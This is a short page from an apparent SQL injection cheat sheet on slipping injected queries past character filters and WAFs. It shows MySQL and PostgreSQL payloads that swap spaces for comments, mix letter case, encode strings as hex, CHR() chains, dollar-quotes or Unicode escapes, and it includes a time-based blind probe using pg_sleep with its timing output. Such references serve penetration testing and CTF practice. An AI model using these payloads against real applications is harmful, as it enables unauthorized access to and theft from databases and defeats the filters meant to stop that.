Bypassing Character Restrictions

General

Space -> Comment

SELECT id, user, password FROM users WHERE id = '1';

SELECT/**/id,/**/user,/**/password/**/FROM/**/users/**/WHERE/**/id/**/=/**/'1';

Upper and Lower case

SELECT id, user, password FROM users WHERE id = '1';

SeLeCT id, user, password frOM users WHeRe id = '1';

MySQL

Hexadecimal

SELECT 0x6a6f726765637466 #SELECT 'jorgectf'

PostgreSQL

ASCII concatenation

print('||'.join("CHR("+str(ord(i))+")" for i in "jorgectf"))

SELECT CHR(106)||CHR(111)||CHR(114)||CHR(103)||CHR(101)||CHR(99)||CHR(116)||CHR(102) #SELECT jorgectf

Single Quote Bypass using $$

$$jorgectf$$ #'jorgectf'
> AND $$jorgectf$$ = 'jorgectf' AND (SELECT 1 FROM pg_sleep(10))=1
0:00:10.491213

Unicode

SELECT U&"\006a\006f\0072\0067\0065\0063\0074\0066" #SELECT jorgectf
SELECT U&'\006a\006f\0072\0067\0065\0063\0074\0066' #SELECT 'jorgectf'
U&'\006a\006f\0072\0067\0065\0063\0074\0066'() #jorgectf()

More information

SQLMap Tamper Scripts (SQL Injection and WAF bypass) TipsMedium

PreviousInjection by clause NextBy Language

Last updated 3 years ago